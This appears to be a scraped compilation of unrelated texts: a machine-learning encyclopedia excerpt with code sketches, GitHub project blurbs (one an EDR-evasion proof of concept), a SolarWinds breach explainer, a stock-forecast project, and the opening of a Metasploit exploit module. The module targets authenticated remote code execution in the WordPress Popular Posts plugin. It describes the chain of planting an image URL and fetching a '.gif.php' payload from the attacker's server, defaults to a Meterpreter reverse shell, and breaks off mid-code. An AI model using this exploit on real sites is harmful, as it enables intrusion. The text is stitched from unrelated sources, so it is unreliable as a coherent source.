In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Illustration of linear regression on a data set. Regression analysis Main article: Regression analysis Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization (mathematics) methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel[70]), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. Bayesian networks Main article: Bayesian network A simple Bayesian network. Rain influences whether the sprinkler is activated, and both rain and the sprinkler influence whether the grass is wet. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. Genetic algorithms Main article: Genetic algorithm A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s.[71][72] Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms.[73] Training models Usually, machine learning models require a lot of data in order for them to perform well. Usually, when training a machine learning model, one needs to collect a large, representative sample of data from a training set. Data from the training set can be as varied as a corpus of text, a collection of images, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Federated learning Main article: Federated learning Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. 
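As a minimal sketch of that idea (far simpler than any production system, including the Gboard deployment described next): each client computes an update on its own data, and only the model parameters are sent back and averaged.

```typescript
// Toy federated averaging: clients never share raw data, only updated weights.
type Weights = number[];

// Placeholder "local training": nudge each weight toward the mean of the
// corresponding feature in this client's local rows.
function localUpdate(global: Weights, localRows: number[][]): Weights {
  return global.map((w, i) => {
    const mean = localRows.reduce((sum, row) => sum + row[i], 0) / localRows.length;
    return w + 0.1 * (mean - w);
  });
}

// The server averages the clients' updated weights into a new global model.
function federatedAverage(global: Weights, clients: number[][][]): Weights {
  const updates = clients.map(rows => localUpdate(global, rows));
  return global.map((_, i) => updates.reduce((sum, u) => sum + u[i], 0) / updates.length);
}

const nextModel = federatedAverage([0, 0], [
  [[1, 2], [3, 4]], // client A's local rows
  [[5, 6], [7, 8]], // client B's local rows
]);
console.log(nextModel);
```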
For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google.[74] Applications There are many applications for machine learning, including: Agriculture Anatomy Adaptive websites Affective computing Banking Bioinformatics Brain–machine interfaces Cheminformatics Citizen science Computer networks Computer vision Credit-card fraud detection Data quality DNA sequence classification Economics Financial market analysis[75] General game playing Handwriting recognition Information retrieval Insurance Internet fraud detection Linguistics Machine learning control Machine perception Machine translation Marketing Medical diagnosis Natural language processing Natural language understanding Online advertising Optimization Recommender systems Robot locomotion Search engines Sentiment analysis Sequence mining Software engineering Speech recognition Structural health monitoring Syntactic pattern recognition Telecommunication Theorem proving Time series forecasting User behavior analytics In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million.[76] Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.[77] In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis.[78] In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software.[79] In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists.[80] In 2019 Springer Nature published the first research book created using machine learning.[81] Limitations Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results.[82][83][84] Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems.[85] In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision.[86] Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested.[87][88] Bias Main article: Algorithmic bias Machine learning approaches in particular can suffer from different data biases. A machine learning system trained on current customers only may not be able to predict the needs of new customer groups that are not represented in the training data. 
When trained on man-made data, machine learning is likely to pick up the same constitutional and unconscious biases already present in society.[89] Language models learned from data have been shown to contain human-like biases.[90][91] Machine learning systems used for criminal risk assessment have been found to be biased against black people.[92][93] In 2015, Google photos would often tag black people as gorillas,[94] and in 2018 this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data, and thus was not able to recognize real gorillas at all.[95] Similar issues with recognizing non-white people have been found in many other systems.[96] In 2016, Microsoft tested a chatbot that learned from Twitter, and it quickly picked up racist and sexist language.[97] Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains.[98] Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "There’s nothing artificial about AI...It’s inspired by people, it’s created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility.”[99] Model assessments Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2/3 training set and 1/3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy.[100] In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC).[101] Ethics Machine learning poses a host of ethical questions. Systems which are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices.[102] For example, using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants against similarity to previous successful applicants.[103][104] Responsible collection of data and documentation of algorithmic rules used by a system thus is a critical part of machine learning. 
Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases.[105][106] Other forms of ethical challenges, not related to personal biases, are more seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is huge potential for machine learning in health care to provide professionals a great tool to diagnose, medicate, and even plan recovery paths for patients, but this will not happen until the personal biases mentioned previously, and these "greed" biases are addressed.[107] Hardware Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of non-linear hidden units.[108] By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI.[109] OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months.[110][111] Software Software suites containing a variety of machine learning algorithms include the following: Free and open-source so
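Returning to the model-assessment discussion above, here is a small self-contained sketch of the two schemes it mentions: a conventional 2/3-1/3 holdout split and K-fold partitioning of example indices. The data themselves and any model are left as placeholders.

```typescript
// Sketch of the evaluation schemes described in the "Model assessments"
// paragraph above: shuffle example indices, then split them.
function shuffled(n: number): number[] {
  const idx = Array.from({ length: n }, (_, i) => i);
  for (let i = n - 1; i > 0; i--) {
    const j = Math.floor(Math.random() * (i + 1));
    [idx[i], idx[j]] = [idx[j], idx[i]];
  }
  return idx;
}

// Holdout: conventionally about 2/3 of the examples train the model, 1/3 test it.
function holdoutSplit(n: number, trainFraction = 2 / 3) {
  const idx = shuffled(n);
  const cut = Math.floor(n * trainFraction);
  return { train: idx.slice(0, cut), test: idx.slice(cut) };
}

// K-fold: partition indices into K disjoint folds; each fold is the test set once.
function kFolds(n: number, k: number): number[][] {
  const idx = shuffled(n);
  return Array.from({ length: k }, (_, fold) => idx.filter((_, i) => i % k === fold));
}

console.log(holdoutSplit(12));
console.log(kFolds(12, 3));
```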
rpau / Junit4git: JUnit Extensions for Test Impact Analysis
Ilyushin / EconomicIntelligence: The project focuses on the use of public data to assess the economic situation in the country, based on the state of the stock market and the national means of payment, in particular the national currency. Data sources: open data from the Ministry of Finance of the Russian Federation, Moscow Exchange data, and Google Finance data. Technologies used: Backend: relational database - Microsoft SQL Server 2014; multidimensional databases, data mining models and OLAP cubes - Microsoft Analysis Services 12.0; web server - Windows Server 2012 / Internet Information Services; a custom ASP.NET HTTP RESTful interface for interaction with the frontend; ETL (data loading and pre-processing, management of data refreshes) - SQL Server Integration Services 2014 (developed in Visual Studio 2013 with SSDT). Frontend: AngularJS, Chart.js, Twitter Bootstrap. The data were chosen so that the granularity of each set is no coarser than one day. The result is an analytical repository (Kimball model, star topology) filled with data, which was used to build multidimensional databases and OLAP cubes, as well as data-analysis models based on two main algorithms: Microsoft Time Series and Microsoft Neural Network. To connect the frontend and backend, the backend server exposes an HTTP RESTful interface that returns JSON documents as finished data sets. The project covers two main areas: intelligent visualization of open data, and analysis of open data and construction of forecasts based on it. Intelligent visualization uses MDX queries against the OLAP cube, followed by drilldown into the data; the system allows the user to quickly find the "weak points" of the economy within the collected data. Time-series prediction uses a standard mix of the ARTXP and ARIMA algorithms, without cross-prediction queries (although corrected data can be loaded into the system). These algorithms were tested primarily on foreign exchange rates (the US dollar) and on the assets of banks included in the special list of the Ministry of Finance. In addition, different algorithm configurations are shown for assets: long-term, short-term and medium-term (balanced) plans. The impact of oil prices and the foreign exchange rate on total market capitalization was assessed on a sample of the collected data: companies with a total market capitalization of 100 to 500 million rubles that were present in the market during 2013-2015. The analytical server builds a neural network that takes as input the exchange rates, the companies, the weighted average share price, the company's total capitalization and the price of oil; on request, the resulting models make it possible to evaluate the rate of growth or decline (if any) of a company's capitalization given historical exchange rates and/or oil prices. The system can be extended with new indicators, which would significantly increase forecasting accuracy.
skippy-io / Skippy: Mono-repo for all Skippy projects.
JoasASantos / Probabilistic Call Stack PoC: A proof-of-concept to demonstrate randomized execution paths and their impact on call stack signatures — ideal for EDR testing, behavior-based detection research, and evasion analysis.
DataDog / Datadog Ci Rb: Ruby library for Datadog Test Optimization
Mario-Kart-Felix / Solar Wind Hacker Book: 2020 was a roller coaster of major, world-shaking events. We all couldn't wait for the year to end. But just as 2020 was about to close, it pulled another fast one on us: the SolarWinds hack, one of the biggest cybersecurity breaches of the 21st century. The SolarWinds hack was a major event not because a single company was breached, but because it triggered a much larger supply chain incident that affected thousands of organizations, including the U.S. government. What is SolarWinds? SolarWinds is a major software company headquartered in Austin, Texas, which provides system management tools for network and infrastructure monitoring, and other technical services to hundreds of thousands of organizations around the world. Among the company's products is an IT performance monitoring system called Orion. As an IT monitoring system, SolarWinds Orion has privileged access to IT systems to obtain log and system performance data. It is that privileged position and its wide deployment that made SolarWinds a lucrative and attractive target. What is the SolarWinds hack? The SolarWinds hack is the commonly used term to refer to the supply chain breach that involved the SolarWinds Orion system. In this hack, suspected nation-state hackers -- identified by Microsoft as a group known as Nobelium, and often simply referred to as the SolarWinds hackers by other researchers -- gained access to the networks, systems and data of thousands of SolarWinds customers. The breadth of the hack is unprecedented and one of the largest, if not the largest, of its kind ever recorded. More than 30,000 public and private organizations -- including local, state and federal agencies -- use the Orion network management system to manage their IT resources. As a result, the hack compromised the data, networks and systems of thousands when SolarWinds inadvertently delivered the backdoor malware as an update to the Orion software. SolarWinds customers weren't the only ones affected. Because the hack exposed the inner workings of Orion users, the hackers could potentially gain access to the data and networks of their customers and partners as well -- enabling the number of affected victims to grow exponentially from there. Hackers compromised a digitally signed SolarWinds Orion network monitoring component, opening a backdoor into the networks of thousands of SolarWinds government and enterprise customers. How did the SolarWinds hack happen? The hackers used a method known as a supply chain attack to insert malicious code into the Orion system. A supply chain attack works by targeting a third party with access to an organization's systems rather than trying to hack the networks directly. The third-party software, in this case the SolarWinds Orion Platform, creates a backdoor through which hackers can access and impersonate users and accounts of victim organizations. The malware could also access system files and blend in with legitimate SolarWinds activity without detection, even by antivirus software. SolarWinds was a perfect target for this kind of supply chain attack. Because its Orion software is used by many multinational companies and government agencies, all the hackers had to do was install the malicious code into a new batch of software distributed by SolarWinds as an update or patch. The SolarWinds hack timeline. Here is a timeline of the SolarWinds hack: September 2019. 
October 2019: Threat actors test an initial code injection into Orion.
Feb. 20, 2020: Malicious code known as Sunburst is injected into Orion.
March 26, 2020: SolarWinds unknowingly starts sending out Orion software updates containing the hacked code.
According to a U.S. Department of Homeland Security advisory, the affected versions of SolarWinds Orion are 2019.4 through 2020.2.1 HF1. More than 18,000 SolarWinds customers installed the malicious updates, with the malware spreading undetected. Through this code, hackers accessed the information technology systems of SolarWinds customers, which they could then use to install even more malware to spy on other companies and organizations.
Who was affected? According to reports, the malware affected many companies and organizations. Even government departments such as Homeland Security, State, Commerce and Treasury were affected, as there was evidence that emails were missing from their systems. Private companies such as FireEye, Microsoft, Intel, Cisco and Deloitte also suffered from this attack. The breach was first detected by cybersecurity company FireEye. The company confirmed it had been infected with the malware when it saw the infection in customer systems. FireEye labeled the SolarWinds hack "UNC2452" and identified the backdoor used to gain access to its systems through SolarWinds as "Sunburst." Microsoft also confirmed that it found signs of the malware in its systems, as the breach was affecting its customers as well. Reports indicated Microsoft's own systems were being used to further the hacking attack, but Microsoft denied this claim to news agencies. Later, the company worked with FireEye and GoDaddy to block and isolate versions of Orion known to contain the malware and cut off hackers from customers' systems. They did so by turning the domain used by the Sunburst backdoor into a kill switch, a mechanism that prevents Sunburst from operating further. Nonetheless, even with the kill switch in place, the hack is still ongoing. Investigators have a lot of data to look through, as many companies using the Orion software aren't yet sure they are free of the backdoor malware. It will take a long time before the full impact of the hack is known.
Why did it take so long to detect the SolarWinds attack? With attackers having first gained access to the SolarWinds systems in September 2019 and the attack not being publicly discovered or reported until December 2020, the attackers may well have had 14 or more months of unfettered access. The time between when an attacker gains access and when the attack is actually discovered is often referred to as dwell time. According to a report released in January 2020 by security firm CrowdStrike, the average dwell time in 2019 was 95 days. Given that it took well over a year from the time the attackers first entered the SolarWinds network until the breach was discovered, the dwell time in this attack far exceeded the average. The question of why it took so long to detect the SolarWinds attack has a lot to do with the sophistication of the Sunburst code and the hackers who executed the attack.
"Analysis suggests that by managing the intrusion through multiple servers based in the United States and mimicking legitimate network traffic, the attackers were able to circumvent threat detection techniques employed by both SolarWinds, other private companies, and the federal government," SolarWinds said in its analysis of the attack. FireEye, which was the first firm to publicly report the attack, conducted its own analysis of the SolarWinds attack. In its report, FireEye described in detail the complex series of action that the attackers took to mask their tracks. Even before Sunburst attempts to connect out to its command-and-control server, the malware executes a number of checks to make sure no antimalware or forensic analysis tools are running. What was the purpose of the hack? The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad. There are speculations that many enterprises might be collateral damage, as the main focus of the attack was government agencies that make use of the SolarWinds IT management systems. Who was responsible for the hack? Federal investigators and cybersecurity agents believe a Russian espionage operation -- mostly likely Russia's Foreign Intelligence Service -- is behind the SolarWinds attack. The Russian government has denied any involvement in the attack, releasing a statement that said, "Malicious activities in the information space contradicts the principles of the Russian foreign policy, national interests and understanding of interstate relations." They also added that "Russia does not conduct offensive operations in the cyber domain." Contrary to experts in his administration, then-President Donald Trump hinted at around the time of the discovery of the SolarWinds hack that Chinese hackers might be behind the cybersecurity attack. However, he did not present any evidence to back up his claim. Shortly after his inauguration, President Joe Biden vowed that his administration intended to hold Russia accountable, through the launch of a full-scale intelligence assessment and review of the SolarWinds attack and those behind it. The president also created the position of deputy national security adviser for cybersecurity as part of the National Security Council. The role, held by veteran intelligence operative Anne Neuberger, is part of an overall bid by the Biden administration to refresh the federal government's approach to cybersecurity and better respond to nation-state actors. Naming the attack: What is Solorigate, Sunburst and Nobelium? The SolarWinds attack has a number of different names associated with it. While the attack is often referred to simply as the SolarWinds attack, that isn't the only name to know. Sunburst. This is the name of the actual malicious code injection that was planted by hackers into the SolarWinds Orion IT monitoring system code. Both SolarWinds and CrowdStrike generally refer to the attack as Sunburst. Solorigate. Microsoft initially dubbed the actual threat actor group behind the SolarWinds attack as Solorigate. It's a name that stuck and was adopted by other researchers as well as media. Nobelium. 
In March 2021, Microsoft decided that the primary designation for the threat actor behind the SolarWinds attack should actually be Nobelium -- the idea being that the group is active against multiple victims -- not just SolarWinds -- and uses more malware than just Sunburst.
The China connection to the SolarWinds attack: While it is suspected that the initial Sunburst code and the attack against SolarWinds and its users came from a threat actor based in Russia, other nation-state threat actors have also used SolarWinds in attacks. According to a Reuters report, suspected nation-state hackers based in China exploited SolarWinds during the same period of time the Sunburst attack occurred. The suspected China-based threat actors targeted the National Finance Center, a payroll agency within the U.S. Department of Agriculture. It is suspected that the China-based attackers did not use Sunburst, but rather a different malware that SolarWinds identifies as Supernova.
Why is the SolarWinds hack important? The SolarWinds supply chain attack is a global hack, as threat actors turned the Orion software into a weapon for gaining access to several government systems and thousands of private systems around the world. Because the software -- and by extension the Sunburst malware -- has access to entire networks, many government and enterprise networks and systems face the risk of significant breaches. The hack could also be the catalyst for rapid, broad change in the cybersecurity industry. Many companies and government agencies are now in the process of devising new methods to react to these types of attacks before they happen. Governments and organizations are learning that it is not enough to build a firewall and hope it protects them. They have to actively seek out vulnerabilities in their systems and either shore them up or turn them into traps against these types of attacks. Since the hack was discovered, SolarWinds has recommended that customers update their existing Orion platform. The company has released patches for the malware and other potential vulnerabilities discovered since the initial Orion attack. SolarWinds also recommended that customers unable to update Orion isolate SolarWinds servers and/or change passwords for accounts that have access to those servers. The greater White House cybersecurity focus will be crucial, some industry experts have said, but organizations should also consider adopting modern software-as-a-service tools for monitoring and collaboration. While the cybersecurity industry has advanced significantly in the last decade, these kinds of attacks show that there is still a long way to go to get truly secure systems.
The Nobelium group continues to attack targets: The suspected threat actor group behind the SolarWinds attack has remained active in 2021 and hasn't stopped at just targeting SolarWinds. On May 27, 2021, Microsoft reported that Nobelium, the group allegedly behind the SolarWinds attack, infiltrated software from email marketing service Constant Contact. According to Microsoft, Nobelium targeted approximately 3,000 email accounts at more than 150 different organizations. The initial attack vector appears to be an account used by USAID. From that initial foothold, Nobelium was able to send out phishing emails in an attempt to get victims to click on a link that would deploy a backdoor Trojan designed to steal user information.
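One practical consequence of the long dwell time described above is that, once a backdoored component is publicly identified, defenders typically fall back on indicator-of-compromise (IOC) sweeps of hosts that run the affected software. The snippet below is a minimal, illustrative sketch of such a sweep in Python; the scan directory and the entries in KNOWN_BAD are placeholders, not real Sunburst hashes, and a real response would rely on vendor and CISA guidance rather than a script like this.

```python
# Minimal IOC sweep sketch: hash DLLs under an install directory and flag any
# whose SHA-256 appears in a locally maintained list of known-bad indicators.
import hashlib
from pathlib import Path

# Placeholder indicator list; real IOC hashes would be loaded from a trusted feed.
KNOWN_BAD = {
    "0000000000000000000000000000000000000000000000000000000000000000",
}

def sha256_of(path: Path) -> str:
    """Stream a file and return its SHA-256 hex digest."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan(root: str) -> list:
    """Return DLL paths under root whose digest appears in the indicator list."""
    return [p for p in Path(root).rglob("*.dll") if sha256_of(p) in KNOWN_BAD]

if __name__ == "__main__":
    for hit in scan(r"C:\Program Files (x86)\SolarWinds"):  # placeholder install path
        print(f"Possible Sunburst artifact: {hit}")
```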
Daniblit / Ensemble Predictive Model Forecasting AMGEN Stock Price At Year End 31st: The basis of this project is analyzing Amgen's future profitability based on its current business environment and financial performance. Technical analysis, on the other hand, involves reading charts and using statistical figures to identify trends in the stock market. The dataset used for this analysis was downloaded from Yahoo Finance for the years 2009 to 2019. There are multiple variables in the dataset: date, open, high, low, volume, and adjusted close. The Open and Close columns represent the starting and final price at which the stock is traded on a day. High and Low represent the maximum and minimum price of the share for the day. Although profit or loss is usually calculated from the closing price of a stock for the day, I used the adjusted closing price as the target variable. As independent variables, I downloaded data on the inflation rate, unemployment rate, Industrial Production Index, Consumer Price Index for All Urban Consumers: All Items, Real Gross Domestic Product, Quarterly Financial Report: U.S. Corporations: Cash Dividends Charged to Retained Earnings All Manufacturing: All Nondurable Manufacturing: Chemicals: Pharmaceuticals and Medicines Industry, Producer Price Index by Industry: Pharmaceutical Preparation Manufacturing, 30-Year Treasury Constant Maturity Rate, and Producer Price Index by Industry: Pharmaceutical and Medicine Manufacturing Index. The independent variables are economic parameters which were obtained from the Federal Reserve Economic Data (FRED) website.
Methodology
1. Linear Regression: The linear regression model returns an equation that determines the relationship between the independent variables and the dependent variable. I used the linear regression tool in Alteryx together with the ARIMA tool to forecast the stock price for the year. The algorithm was trained on the historical data to see how the variables impact the dependent variable. The test data was used to predict the adjusted closing price for the year, yielding a predicted stock price of $193.38.
2. Support Vector Machines (SVM): Support vector machines, also known as support vector networks, are a popular set of supervised learning algorithms originally developed for classification (categorical target) problems that can also be used for regression (numerical target) problems. SVMs are memory efficient and can handle many predictor variables. The model finds the line (one predictor), plane (two predictors) or hyperplane (three or more predictors) that maximally separates groups of records, based on a measure of distance, into different groups according to the target variable. A kernel function provides the measure of distance that causes records to be placed in the same or different groups, and involves taking a function of the predictor variables to define the distance metric. I used the SVM tool in Alteryx together with the ARIMA tool to forecast the stock price for the year, yielding a predicted stock price of $189.44.
3. Spline Model: The Spline Model tool was used because it provides the multivariate adaptive regression splines (MARS) algorithm of Friedman. This statistical learning model self-determines which subset of fields best predicts a target field of interest and can capture highly nonlinear relationships and interactions between fields. I used the Spline tool in Alteryx together with the ARIMA tool to forecast the stock price for the year, yielding a predicted stock price of $201.84.
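The project itself is built with Alteryx tools, which are not reproduced here, but the sketch below shows the same three model families fitted in Python on a merged Yahoo Finance/FRED table. The file name and column names (adj_close, cpi, and so on) are assumptions about that merged dataset, and scikit-learn's SplineTransformer (available in scikit-learn 1.0+) is only a rough stand-in for Friedman's MARS.

```python
# Sketch: fit linear, SVM and spline-based regressors on lagged price + macro features.
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import SplineTransformer, StandardScaler
from sklearn.svm import SVR

# Merged Yahoo Finance / FRED table; file and column names are assumptions.
df = pd.read_csv("amgn_with_fred.csv", parse_dates=["date"]).sort_values("date")
df["adj_close_lag1"] = df["adj_close"].shift(1)   # previous day's adjusted close
df = df.dropna()

features = ["adj_close_lag1", "cpi", "unemployment_rate", "indpro", "treasury_30y"]
X, y = df[features], df["adj_close"]

models = {
    "linear": LinearRegression(),
    "svm": make_pipeline(StandardScaler(), SVR(kernel="rbf", C=10.0)),
    # SplineTransformer + linear model as a rough stand-in for Friedman's MARS
    "spline": make_pipeline(SplineTransformer(degree=3, n_knots=8), LinearRegression()),
}
for name, model in models.items():
    model.fit(X, y)
    print(name, "in-sample prediction for the last day:", round(model.predict(X)[-1], 2))
```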
The results from the models were weighted by comparing the RMSE of each model. A lower RMSE indicates that the model's predictions were closer to the actual values. However, a simpler model with the same RMSE as a more complex model is generally better, as simpler models are less likely to be overfit. Though the Spline model had a lower RMSE, the Linear Regression model had fewer variables. Thus, we combined the three models with the ARIMA forecast in a model ensemble, which allows us to use the results of multiple models (a minimal sketch of this inverse-RMSE weighting appears below). The forecasted stock price is $197.99, a 1.5% increase, for 31st December 2019. Apart from economic parameters, the stock price is affected by news about the company and other factors such as demonetization or a merger/demerger of companies. There are certain intangible factors which can be impossible to predict beforehand; hence the model predicts that the stock price of Amgen will continue to rise unless there is a drastic downturn in the company.
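Continuing the sketch above, the idea of down-weighting higher-RMSE models can be illustrated by weighting each model's holdout forecast by the inverse of its RMSE. The chronological 80/20 split and the weighting rule are assumptions for illustration, not the exact Alteryx ensemble.

```python
# Sketch: RMSE-weighted ensemble of the models fitted in the previous snippet.
from sklearn.metrics import mean_squared_error

# Chronological 80/20 holdout (assumption; the original workflow may differ).
split = int(len(X) * 0.8)
X_tr, X_te = X.iloc[:split], X.iloc[split:]
y_tr, y_te = y.iloc[:split], y.iloc[split:]

rmse, preds = {}, {}
for name, model in models.items():
    model.fit(X_tr, y_tr)
    preds[name] = model.predict(X_te)
    rmse[name] = mean_squared_error(y_te, preds[name]) ** 0.5

# Inverse-RMSE weights: lower-error models contribute more to the ensemble.
weights = {name: 1.0 / err for name, err in rmse.items()}
total = sum(weights.values())
ensemble = sum(weights[name] / total * preds[name] for name in preds)

print({name: round(err, 2) for name, err in rmse.items()})
print("RMSE-weighted ensemble forecast for the last holdout day:", round(ensemble[-1], 2))
```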
Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? 
